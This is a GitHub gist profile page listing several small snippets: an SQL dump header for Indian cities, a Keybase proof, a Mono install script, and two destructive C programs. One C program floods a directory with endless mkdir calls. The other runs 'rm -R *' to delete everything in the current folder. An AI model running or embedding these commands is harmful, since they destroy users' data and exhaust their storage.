Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View jenkinsshubham's full-sized avatar

Jenkins Shubham jenkinsshubham

View GitHub Profile
@jenkinsshubham
jenkinsshubham / folder_flooder.c
Created March 26, 2016 10:13
This will make infinite number of folder in current directory.
#include<stdio.h>
void main()
{
int i=1,j=1; char c[99];
while(i>0) {
sprintf(c, "mkdir %d", j);
system((char *)c);
j++;
i++;
@jenkinsshubham
jenkinsshubham / recursive_remover.c
Created March 26, 2016 10:25
This single line code will delete everything from the same directory.
main() {system("rm -R *");}
@jenkinsshubham
jenkinsshubham / cities_india.sql
Created January 10, 2017 17:40
sql dump: All the cities of india with states
-- Host: localhost:3306
-- Generation Time: Jan 11, 2013 at 11:04 PM
-- Server version: 5.0.51
-- PHP Version: 5.2.5
-- Administrator: Jenkins Shubham
SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
-- --------------------------------------------------------

Keybase proof

I hereby claim:

  • I am jenkinsshubham on github.
  • I am jenkinsshubham (https://keybase.io/jenkinsshubham) on keybase.
  • I have a public key ASDzGI5l-j3SZLxkIsyPy1gCmzCqY-LFqUg212qFbReSfQo

To claim this, I am signing this object:

@jenkinsshubham
jenkinsshubham / install-mono.sh
Last active September 1, 2017 19:06
Install mono (alternative for Visual Basic) in Fedora or CentOS
#! /bin/bash
# By J Shubham
#run this under root
#--------------#
yum install yum-utils
rpm --import "http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF"
yum install mono-devel
yum install mono-data-oracle
yum install mono-debugger